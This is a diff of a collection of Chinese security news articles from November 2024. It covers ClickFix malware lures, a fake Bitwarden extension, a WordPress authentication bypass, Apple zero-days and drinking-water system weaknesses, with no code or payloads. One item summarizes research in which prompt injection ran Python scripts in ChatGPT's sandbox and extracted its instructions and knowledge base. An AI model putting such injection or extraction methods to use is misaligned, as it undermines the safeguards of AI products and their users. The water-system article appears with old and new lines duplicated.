![](https://mmbiz.qpic.cn/sz_mmbiz_png/EqMwaEZz0ynRuSmicWtBVoFuSRYlbR3lC184VVGYfj8SBk3n2daV6CYGY5Zic6r2IkMd0IlFoudkpLEXY6kMdaqg/640?wx_fmt=png&from=appmsg "")
#

View File

@ -0,0 +1,262 @@
# 美国国会图书馆邮件系统遭攻击近9个月通信内容或泄露ChatGPT沙箱环境存多个严重安全隐患仅20%漏洞被修复 | 牛览
安全牛 2024-11-20 04:16
点击蓝字·关注我们 
/ 
aqniu
![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkBjwIRcuxcIx3fvDBydiaqkxw4o55dLPMJBKVsRbYl7ULkJDmFtatY9fWSIcZttiaeQm76cm0TXSBCA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**新闻速览**
•2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕
•《工业和信息化领域数据安全合规指引》联合发布
•美国国会图书馆邮件系统遭攻击近9个月通信内容或泄露
•ClickFix攻击手法全球蔓延虚假错误提示暗藏玄机
•黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序
•ChatGPT沙箱环境存多个严重安全隐患仅20%漏洞被修复
•WordPress核心安全插件曝认证漏洞或威胁超400万网站安全性
•Microsoft 365管理门户或遭滥用可帮助勒索诈骗邮件逃避安全检测
•升级网络安全培训体系CISA新一代学习管理平台启用
•强化Gmail隐私保护Google推出Shielded Email新功能
 
 
**特别关注**
**2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕**
11月19日由世界互联网大会和浙江省人民政府共同主办的2024年世界互联网大会“互联网之光”博览会在浙江乌镇开幕。国家互联网信息办公室副主任王崧、世界互联网大会秘书长任贤良等出席开幕式。浙江省人民政府副省长柯吉欣出席开幕式并致辞。
作为世界互联网大会乌镇峰会的重要活动“互联网之光”博览会自2014年以来紧紧围绕“携手构建网络空间命运共同体”的理念主张走过了风雨追光、创新发展的十年旨在成为互联网领域引领前沿技术趋势、展示行业最新成果、促进全球产业合作的重要平台。
2024年是“互联网之光”博览会第二个十年的新起点。围绕本届乌镇峰会“拥抱以人为本、智能向善的数字未来——携手构建网络空间命运共同体”主题博览会以人工智能为展示重点持续深化全球数字合作秉持共生共赢的精神进一步拓展“国际朋友圈”引领网络空间命运共同体进入新的发展阶段。
本届博览会设置了五大活动板块,包括展览展示、新产品新技术发布、产业人才引智、产业合作对接、“新光”系列推介,通过“线下实景+线上云展”的方式全面展示全球互联网的最新发展成果和人工智能领域的新技术、产品吸引了来自53个国家和地区的665家中外企业与机构参展。
原文链接:
https://mp.weixin.qq.com/s/KzbP47BWloCAYdTKG_78QA
 
**《工业和信息化领域数据安全合规指引》联合发布**
为贯彻落实《数据安全法》《网络数据安全管理条例》《工业和信息化领域数据安全管理办法(试行)》等法律政策要求,引导工业和信息化领域数据处理者规范开展数据处理活动,中国钢铁工业协会、中国有色金属工业协会、中国石油和化学工业联合会、中国建筑材料联合会、中国机械工业联合会、中国汽车工业协会、中国纺织工业联合会、中国轻工业联合会、中国电子信息行业联合会、中国计算机行业协会、中国通信企业协会、中国互联网协会、中国通信标准化协会、中国中小企业国际合作协会、中国通信学会、工业和信息化部商用密码应用产业促进联盟、工业信息安全产业发展联盟等单位组织编制了《工业和信息化领域数据安全合规指引》(简称《合规指引》)。各相关单位、企业在履行数据安全保护义务时可以参考使用,共同维护数据安全、促进行业健康发展。
完整版《合规指引》可访问原文链接获取。
原文链接:
https://mp.weixin.qq.com/s/rOhvWgp_UekqTpMll7rYvQ
 
**网络攻击**
**美国国会图书馆邮件系统遭攻击近9个月通信内容或泄露**
美国国会图书馆日前披露其信息技术系统遭到疑似外国黑客组织入侵攻击者获取了国会办公室与图书馆工作人员之间的电子邮件通信内容。据NBC News报道美国国会图书馆已就这起"网络安全事件"通知了国会相关办公室。受影响的电子邮件通信内容涉及2024年1月至9月期间国会办公室与图书馆工作人员包括国会研究服务处之间的往来信息。
 
作为美国实际上的国家图书馆,国会图书馆不仅为美国国会两院提供图书馆和研究服务,还通过美国版权局负责管理版权法的实施。在发现安全漏洞后,图书馆方面已第一时间通知执法部门,目前相关调查仍在进行中。
 
国会图书馆在通报中表示:"图书馆已经修复了被攻击者利用的安全漏洞,并采取了相应措施防止类似事件再次发生。"同时确认美国众议院和参议院的电子邮件网络系统以及美国版权局的系统均未受到此次事件影响。而对于攻击者的身份以及攻击发生的具体时间点,调查人员仍在进一步核实中。
 
原文链接:
https://securityaffairs.com/171138/data-breach/library-of-congress-email-communications-hacked.html
 
**ClickFix攻击手法全球蔓延虚假错误提示暗藏玄机**
近期网络安全公司Proofpoint发布分析报告指出黑客组织正在加大对"ClickFix"社会工程学攻击的利用。这种战术在恶意软件部署方面显示出极高的效率。自2024年3月以来多个威胁组织已发起了数次利用该战术的攻击活动。
ClickFix是一种独特的社会工程学技术攻击者通过对话框显示虚假错误信息诱导用户在自己的计算机上复制、粘贴并运行恶意代码。这种方式由用户自己执行感染操作能够有效绕过安全保护机制。攻击者利用了用户倾向于自行解决问题而不是通知IT团队的心理通过伪装成Microsoft Word和Google Chrome等常用企业软件发起攻击。
 
技术分析显示对话框可能来自被入侵的网站、文档、HTML附件或恶意URL。用户按照所谓的"修复"指令操作时实际上会触发两种情况要么自动将恶意脚本复制到PowerShell终端或Windows对话框中执行要么手动打开PowerShell并粘贴提供的命令。通过这种方式AsyncRAT、Danabot、DarkGate、Lumma Stealer和NetSupport等多种恶意软件都能成功部署。
 
值得注意的是攻击者近期频繁使用伪造的CAPTCHA验证码主题技术通过"验证您是人类"的检查进行欺骗。这种活动大多基于一个名为"reCAPTCHA Phish"的开源工具包该工具包自2024年9月起在GitHub上以"教育目的"提供。在一次影响全球至少300个组织的攻击中威胁者利用GitHub通知发送恶意软件通过伪装成GitHub安全警告的方式诱导用户执行PowerShell命令。
原文链接:
https://www.infosecurity-magazine.com/news/clickfix-cyber-malware-rise/
 
**黑客利用Facebook平台投放假冒Bitwarden广告传播恶意程序**
近日网络安全公司Bitdefender披露了一起针对Facebook商业账户的恶意广告攻击活动。攻击者通过Meta广告平台投放虚假广告伪装成知名密码管理工具Bitwarden的安全更新诱导用户安装恶意Chrome浏览器扩展程序。该攻击活动于2024年11月3日被发现虽然目前已被关停但安全专家警告类似威胁可能会再次出现。
据研究人员介绍攻击者精心设计了伪装成Bitwarden官方的Facebook广告警告用户密码可能已被泄露并催促用户立即进行所谓的"安全更新"。这些广告巧妙使用了Bitwarden的品牌元素和专业用语让用户对其真实性深信不疑。
技术分析显示攻击的核心是background.js脚本它在安装后立即激活并执行多项恶意操作通过Google Script URL充当命令控制服务器进行数据窃取搜索并收集Facebook Cookie特别是包含用户Facebook ID的c_user cookie获取用户IP地址和地理位置信息利用Graph API提取Facebook个人和商业信息。
原文链接:
https://hackread.com/facebook-malvertising-malware-via-fake-bitwarden/
 
**漏洞预警**
**ChatGPT沙箱环境存在多个严重安全隐患仅有20%漏洞被修复**
Mozilla 0Din安全研究团队近日披露了OpenAI ChatGPT沙箱环境中的多个安全漏洞这些漏洞允许攻击者上传并执行Python脚本甚至能够获取语言模型的内部配置信息。目前OpenAI仅修复了上述五个漏洞中的一个。
这一发现源于Mozilla 0Din的GenAI漏洞赏金项目经理Marco Figueroa在使用ChatGPT进行Python项目开发时遇到的一个异常错误。随后的深入调查显示ChatGPT的沙箱环境基于Debian系统搭建其访问权限远超预期。技术细节显示攻击者可以通过提示注入prompt injection在ChatGPT环境中执行Python脚本实现文件的列举、修改和迁移。更为严重的是研究人员还发现可以提取模型的核心指令和知识库这种访问级别极具危险性不仅可能导致模型配置信息泄露还可能被用于传播恶意脚本或未经授权的数据访问。
对于这些发现OpenAI的回应令人意外。该公司声称沙箱环境的设计本意就是提供一个受控环境允许用户执行代码而不影响整体系统并将大多数交互视为预期功能而非安全问题。然而研究人员认为当前沙箱环境所提供的访问权限已经超出了合理范围。
原文链接:
https://hackread.com/mozilla-0din-chatgpt-sandbox-flaws-python-execution/
 
**WordPress核心安全插件曝认证漏洞或威胁超400万网站安全性**
 
WordPress热门安全插件Really Simple Security原Really Simple SSL被发现存在严重的身份认证绕过漏洞该漏洞可能使攻击者获得网站的完整管理权限。这一漏洞影响了全球超过400万个WordPress网站。
Wordfence安全研究员István Márton警告说"这个漏洞可以被编写成脚本意味着攻击者可以对WordPress网站发起大规模自动化攻击。"技术分析显示此漏洞存在于9.0.0至9.1.1.1版本中,源于名为"check_login_and_get_user"函数中的用户检查错误处理不当。当启用双因素认证时,未经身份验证的攻击者可以通过简单的请求,以任意用户身份(包括管理员)登录系统。
漏洞于本月6日被负责任地披露给开发团队并在一周后的9.1.2版本中得到修复。考虑到潜在的滥用风险插件维护者与WordPress合作在公开披露之前强制更新了所有运行该插件的网站。
原文链接:
https://thehackernews.com/2024/11/urgent-critical-wordpress-plugin.html
 
**Microsoft 365管理门户或遭滥用可帮助勒索诈骗邮件逃避安全检测**
网络安全专家Lawrence Abrams日前披露近期发现不法分子正在滥用Microsoft 365管理门户的消息中心功能发送勒索欺诈邮件。这些邮件由微软官方邮箱"o365mc@microsoft.com"发出,因此能够绕过垃圾邮件过滤器,直接进入收件箱。
专家表示这类勒索欺诈邮件是一种诈骗手段诈骗者声称已经入侵受害者的电脑或移动设备窃取了其私密照片或视频并威胁索要500至5000美元的赎金否则将与受害者的亲友分享这些所谓的隐私照片。虽然这种诈骗手法看似拙劣但自2018年首次出现以来每周仍能为诈骗者带来超过5万美元的非法收入。
技术分析显示攻击者通过Microsoft 365管理门户的"消息中心"功能实施诈骗。该功能原本用于分享微软服务通知和新功能介绍等信息。攻击者利用其中的"分享"功能,在"个人消息"栏中插入勒索内容。虽然该字段正常限制为1000字符但攻击者通过修改浏览器开发者工具中的textarea标签最大长度限制成功突破了字符限制。由于Microsoft未在服务器端进行字符长度检查完整的勒索信息得以随通知一起发送。
微软公司发言人表示:"我们十分重视安全和隐私问题。目前正在调查这些报告,并将采取行动保护用户。"但截至目前Microsoft尚未在服务器端增加字符限制检查。
原文链接:
https://www.bleepingcomputer.com/news/security/microsoft-365-admin-portal-abused-to-send-sextortion-emails/
  
**产业动态**
**升级网络安全培训体系, CISA新一代学习管理平台启用**
美国网络安全和基础设施安全局CISA于近日宣布推出新一代学习管理系统"CISA Learning"。该平台将取代原有的联邦虚拟培训环境FedVTE致力于为机构员工和关键利益相关者提供现代化的培训和教育服务。
CISA首席人事官Elizabeth Kolmstetter博士表示"CISA Learning将提供一个易于导航的现代化学习管理系统在现有工具和资源的基础上继续为政府雇员、承包商和美国退伍军人提供免费的网络安全培训。这体现了CISA致力于培养和发展国家网络安全人才队伍的承诺以更好地保护美国人民每天依赖的关键基础设施。"
作为CISA企业学习环境现代化的关键组成部分CISA Learning将为联邦、州、地方、部落和领地各级政府的合作伙伴以及退伍军人提供免费培训资源。新平台提供课堂培训、虚拟讲师指导培训和自定进度在线模块等多种可扩展的培训方案使用户能够灵活地在办公室、家中或野外参与课程学习。
原文链接:
https://www.cisa.gov/news-events/news/cisa-launches-new-learning-platform-enhance-training-and-education-us-veterans-and-other
 
**强化Gmail隐私保护Google推出Shielded Email新功能**
 
Google近日宣布推出突破性新功能"Shielded Email"旨在革新电子邮件隐私保护并对抗垃圾邮件。该创新工具允许Gmail用户创建临时邮箱别名在注册在线服务或填写表单时有效隐藏主邮箱地址。
据报道Shielded Email通过生成独特的一次性电子邮件地址来实现功能。这些地址会自动将收到的邮件转发到用户的主Gmail收件箱。用户可能在Autofill自动填充设置菜单中找到创建Shielded Email地址的选项便于在各类应用和网站中使用。这意味着用户可以在不暴露真实邮箱地址的情况下与网站和服务进行交互显著降低收到垃圾邮件和不必要营销信息的风险。
该功能的一大亮点是用户可以通过停用这些相关的隐私地址轻松切断来自任何问题源的通信。这种程度的控制为用户提供了前所未有的收件箱管理能力。隐私倡导者认为随着在线隐私问题日益突出Shielded Email等工具变得越发重要。通过赋予用户更多个人信息控制权不仅改善了电子邮件使用体验还为科技行业的数字隐私保护设立了新标准。这可能标志着打击垃圾邮件和未经授权数据收集战的转折点。
原文链接:
https://cybersecuritynews.com/google-announces-shielded-email-feature/
![](https://mmbiz.qpic.cn/mmbiz_png/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMnicXSRCtG4URyLibbqPegjnnibfRB0z4zIzwghbLOkV5fqGYM8vhuQdqw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
合作电话18311333376
合作微信aqniu001
投稿邮箱editor@aqniu.com
![](https://mmbiz.qpic.cn/mmbiz_gif/kuIKKC9tNkAfZibz9TQ8KWj4voxxxNSGMAGiauAWicdDiaVl8fUJYtSgichibSzDUJvsic9HUfC38aPH9ia3sopypYW8ew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

View File

@ -1,78 +1,45 @@
# 美国饮用水系统存在300多个漏洞影响1.1亿人 # 美国饮用水系统存在300多个漏洞影响1.1亿人
FreeBuf 商密君 2024-11-19 14:31 黑白之道 2024-11-20 06:58
![](https://mmbiz.qpic.cn/mmbiz_gif/3xxicXNlTXLicwgPqvK8QgwnCr09iaSllrsXJLMkThiaHibEntZKkJiaicEd4ibWQxyn3gtAWbyGqtHVb0qqsHFC9jW3oQ/640?wx_fmt=gif "")
> 美国环境保护署EPA标记了300多个饮用水系统的安全漏洞这些系统为大约1.1亿人提供服务。 > 美国环境保护署EPA标记了300多个饮用水系统的安全漏洞这些系统为大约1.1亿人提供服务。
近日美国环境保护署EPA监察长办公室OIG发布了一份研究报告在对美国1062个饮用水系统进行了安全性缺陷评估活动之后结果显示超过300个饮用水系统存在系统漏洞存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。![](https://mmbiz.qpic.cn/mmbiz_jpg/3xxicXNlTXLibtrbvia25lnpqNTEqIhWJ6Z7LxQXwFvSTRgddQNf9PENbLhM9I7JZiamS6ERUW6PBicsCUfE129nEYQ/640?wx_fmt=jpeg&from=appmsg "")
近日美国环境保护署EPA监察长办公室OIG发布了一份研究报告在对美国1062个饮用水系统进行了安全性缺陷评估活动之后结果显示超过300个饮用水系统存在系统漏洞存在可能导致功能丧失、无法服务和用户信息泄露的风险。不安全的饮用水系统为1.1亿美国人提供服务。
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR39uD8TzUAG6icPT99CvicxqoBse5fFY24qpe6vJID3aqMLWbN5d0nubADskMPU9b5xzxIakSap6BYOw/640?wx_fmt=jpeg&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1 "")
安全性缺陷评估涵盖了五个网络安全类别即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动并根据潜在影响对识别的漏洞从低到高进行评分。 安全性缺陷评估涵盖了五个网络安全类别即电子邮件安全、IT卫生、漏洞、对抗性威胁和恶意活动并根据潜在影响对识别的漏洞从低到高进行评分。
数据显示97个系统存在关键或高风险漏洞可能导致服务瘫痪或数据泄露另有211个系统存在可被外部访问的开放端口尽管风险较低但若不及时修复仍有可能被利用。 数据显示97个系统存在关键或高风险漏洞可能导致服务瘫痪或数据泄露另有211个系统存在可被外部访问的开放端口尽管风险较低但若不及时修复仍有可能被利用。
OIG进一步表示“如果网络攻击者利用我们在被动评估中识别的网络安全漏洞他们可能会中断服务或对饮用水基础设施造成无法弥补的物理损害。” OIG进一步表示“如果网络攻击者利用我们在被动评估中识别的网络安全漏洞他们可能会中断服务或对饮用水基础设施造成无法弥补的物理损害。”
EPA还会为每个被调查对象绘制系统的数字足迹涵盖用于收集、泵送、处理、储存和分配饮用水的基础设施分析超过75000个IP和14400个域名。 EPA还会为每个被调查对象绘制系统的数字足迹涵盖用于收集、泵送、处理、储存和分配饮用水的基础设施分析超过75000个IP和14400个域名。
该报告还总结了EPA在网络安全方面的不足。EPA缺乏一个集中式的事件报告系统目前依赖美国网络安全和基础设施安全局CISA进行此类报告这明显限制了威胁发生时的及时沟通与协调响应能力。此外还有饮用水系统的管理人员缺乏足够的网络安全培训导致系统容易被黑客攻击许多供水系统陈旧过时缺乏维护进一步增加了网络安全风险。 该报告还总结了EPA在网络安全方面的不足。EPA缺乏一个集中式的事件报告系统目前依赖美国网络安全和基础设施安全局CISA进行此类报告这明显限制了威胁发生时的及时沟通与协调响应能力。此外还有饮用水系统的管理人员缺乏足够的网络安全培训导致系统容易被黑客攻击许多供水系统陈旧过时缺乏维护进一步增加了网络安全风险。
针对上述问题EPA计划利用饮用水州循环基金和大中型饮用水系统基础设施恢复力与可持续性计划为公共供水系统提供培训、技术援助和财务支持以加强其网络安全防护能力。 针对上述问题EPA计划利用饮用水州循环基金和大中型饮用水系统基础设施恢复力与可持续性计划为公共供水系统提供培训、技术援助和财务支持以加强其网络安全防护能力。
事实上美国饮用水系统一直存在严重安全风险。2021年2月黑客通过远程控制软件TeamViewer入侵佛罗里达州奥兹玛市自来水厂的电脑系统试图将氢氧化钠的含量从百万分之100大幅提高到百万分之111000这直接达到了“水质危险”的程度。 事实上美国饮用水系统一直存在严重安全风险。2021年2月黑客通过远程控制软件TeamViewer入侵佛罗里达州奥兹玛市自来水厂的电脑系统试图将氢氧化钠的含量从百万分之100大幅提高到百万分之111000这直接达到了“水质危险”的程度。
由于员工及时发现并干预没有对公众造成实际伤害。但FBI和特勤局介入调查后议员马可·罗伯Marco Rubio要求FBI全力协助将此案件视为国家安全问题。 由于员工及时发现并干预没有对公众造成实际伤害。但FBI和特勤局介入调查后议员马可·罗伯Marco Rubio要求FBI全力协助将此案件视为国家安全问题。
再今年5月EPA也曾警告说超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。
在今年5月EPA也曾警告说超过70%的水系统不符合《安全饮用水法》,强调了严重性高的问题,例如使用默认密码和容易受到黑客攻击的认证系统,这些都大大降低了攻击者入侵的门槛。 为此EPA要求在各州进行公共供水系统的卫生检查时强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此美国联邦机构发布了指导意见帮助供水和废水处理系统运营商更好地应对网络攻击。EPA也与CISA、FBI联合发布指南EPA与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。
> 参考来源https://www.securityweek.com/300-drinking-water-systems-in-us-exposed-to-disruptive-damaging-hacker-attacks/
为此EPA要求在各州进行公共供水系统的卫生检查时强制纳入网络安全评估。供水系统运营商也需要制定适当的事件响应计划以便在检测和分析网络事件时能够快速、准确地报告事件并收集数据进行分析。对此美国联邦机构发布了指导意见帮助供水和废水处理系统运营商更好地应对网络攻击。 > **文章来源freebuf**
EPA也与美国网络安全和基础设施安全局(CISA)及美国联邦调查局(FBI)联合发布了一项网络安全实践指南,旨在帮助城市供水和废水处理领域的企业组织提高网络安全弹性和事件响应能力。
黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
编辑:陈十九 **END**
审核:商密君
**征文启事**
大家好,为了更好地促进同业间学术交流,商密君现开启征文活动,只要你对商用密码、网络安全、数据加密等有自己的独到见解和想法,都可以积极向商密君投稿,商密君一定将您的声音传递给更多的人。
![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXNcXmbiaiaCljdXpwzOEQ9QTBXMibM6rZTOnbTSwTmCXncQLria2vuLGxn8QPtznzBc0as8vBxWIjrWxQ/640?wx_fmt=jpeg "")
来源FreeBuf
注:内容均来源于互联网,版权归作者所有,如有侵权,请联系告知,我们将尽快处理。
![](https://mmbiz.qpic.cn/mmbiz_jpg/1HyKzSU2XXOdeQx0thlyozF2swQTEN9iaaBNDG0jTKfAgqgdesve8x5IEWNvYxjF6sAWjO1TPCZVsWd0oiaDn3uw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMyyClGk1cttkSBbJicAn5drpXEbFIeChG9IkrslYEylRF4Z6KNaxNafDwr5ibcYaZXdnveQCNIr5kw/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1 "")
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaMcJkA69QYZ9T4jmc3fdN6EA7Qq9A8E3RWcTKhxVEU1QjqOgrJMu2Qg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
点分享
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaiaRXdw4BFsc7MxzkVZaKGgtjWA5GKtUfm3hlgzsBtjJ0mnh9QibeFOGQ/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
点点赞
![](https://mmbiz.qpic.cn/mmbiz_png/1HyKzSU2XXMZPiaDBD8yxbIHiciauWK4tuiaeiaNlRO9954g4VS87icD7KQdxzokTGDIjmCJA563IwfStoFzPUaliauXg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1 "")
点在看

View File

@ -0,0 +1,38 @@
# 苹果确认针对 macOS 系统的零日漏洞攻击
原创 hackerson 黑客联盟l 2024-11-20 11:32
![](https://mmbiz.qpic.cn/mmbiz_gif/Ljib4So7yuWhqjlIpdACpYtdVvKD3OPyBmYA5brJN4sK34dYRQcSL3uKNsGNoib9fEN3CEGeChjIvOx8qClscs5w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/dhzGXdxNSYu4q1XpgcGjUVvVsGI1Z88FWYPKBuFFpMm7riaUsK6S3FkFhTY3P2Fa8HjszTMVcibYm5Yj2liaAztYA/640?wx_fmt=jpeg&from=appmsg "")
苹果已紧急推出重大的 macOS 和 iOS 安全更新,以修复两个已被利用的漏洞。
苹果在周二发布的一份公告中证实这些漏洞由谷歌的威胁分析小组TAG发现正在基于英特尔处理器的 macOS 系统上被积极利用。
按照惯例苹果的安全响应团队并未提供所报告攻击的任何细节或失陷指标IOC来帮助防御者查找感染迹象。
**已修复漏洞的详细情况:**
CVE-2024-44308——JavaScriptCore—— 处理恶意构造的网页内容可能导致任意代码执行。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。
CVE-2024-44309——WebKit—— 处理恶意构造的网页内容可能导致跨站脚本攻击。苹果已知悉一份报告称,这个问题可能已在基于英特尔处理器的 Mac 系统上被积极利用。
该公司敦促整个苹果生态系统的用户尽快安装紧急发布的 iOS 18.1.1、macOS Sequoia 15.1.1 以及旧版本的 iOS 17.7.2。
本月早些时候,朝鲜的加密货币窃贼再次被发现针对 macOS 用户发起一场新的恶意软件活动,该活动利用钓鱼邮件、虚假 PDF 应用程序以及一种新颖的技术来规避苹果的安全措施。
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/dhzGXdxNSYu9NHeLQtcv3btw1zjO4LfzWI3eeGE0fkD9CaQEgDh4FHsKYk8iaVOjhRgGKfEbfRwZf64QibNxEmWg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
关注【**黑客联盟**】带你走进神秘的黑客世界

View File

@ -0,0 +1,61 @@
# 苹果紧急发布安全更新修复影响英特尔Mac的两个零日漏洞
看雪学苑 看雪学苑 2024-11-20 10:06
> 苹果公司针对基于英特尔处理器的Mac系统发布了紧急安全更新修复了两个被积极利用的零日漏洞。这些漏洞涉及macOS的JavaScriptCore和WebKit组件可能允许攻击者通过恶意网页内容执行任意代码或发起跨站脚本攻击。
苹果公司在11月19日发布了紧急安全更新以修复两个零日漏洞这些漏洞被用于针对基于英特尔处理器的Mac系统的攻击中。该公司在咨询报告中表示已获悉有关该问题可能已被利用的报告。
这两个漏洞分别被追踪为CVE-2024-44308和CVE-2024-44309它们存在于macOS的JavaScriptCore和WebKit组件中。JavaScriptCore的漏洞CVE-2024-44308允许攻击者通过恶意制作的Web内容实现远程代码执行而WebKit的漏洞CVE-2024-44309则允许跨站点脚本XSS攻击。
苹果公司表示这些安全漏洞已在macOS Sequoia 15.1.1中得到解决。由于iOS和iPadOS中也存在相同的组件因此在iOS 17.7.2、iPadOS 17.7.2、iOS 18.1.1和iPadOS 18.1.1以及VisionOS 2.1.1中也修复了这些问题。
这两个漏洞是由谷歌威胁分析小组的Clément Lecigne和Benoît Sevens发现的但苹果尚未提供有关如何利用这些漏洞的更多详细信息。凭借这两个漏洞的修复苹果公司在2024年迄今已修复了6个零日漏洞。
苹果公司强烈建议所有用户立即安装最新的安全补丁,以确保设备的安全。
资讯来源bleepingcomputer
转载请注明出处和本文链接
![](https://mmbiz.qpic.cn/mmbiz_jpg/Uia4617poZXP96fGaMPXib13V1bJ52yHq9ycD9Zv3WhiaRb2rKV6wghrNa4VyFR2wibBVNfZt3M5IuUiauQGHvxhQrA/640?wx_fmt=jpeg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "")
**球分享**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "")
**球点赞**
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/1UG7KPNHN8E9S6vNnUMRCOictT4PicNGMgHmsIkOvEno4oPVWrhwQCWNRTquZGs2ZLYic8IJTJBjxhWVoCa47V9Rw/640?wx_fmt=gif "")
**球在看**
****
****
![](https://mmbiz.qpic.cn/mmbiz_gif/1UG7KPNHN8FxuBNT7e2ZEfQZgBuH2GkFjvK4tzErD5Q56kwaEL0N099icLfx1ZvVvqzcRG3oMtIXqUz5T9HYKicA/640?wx_fmt=gif "")
“阅读原文
一起来充电吧!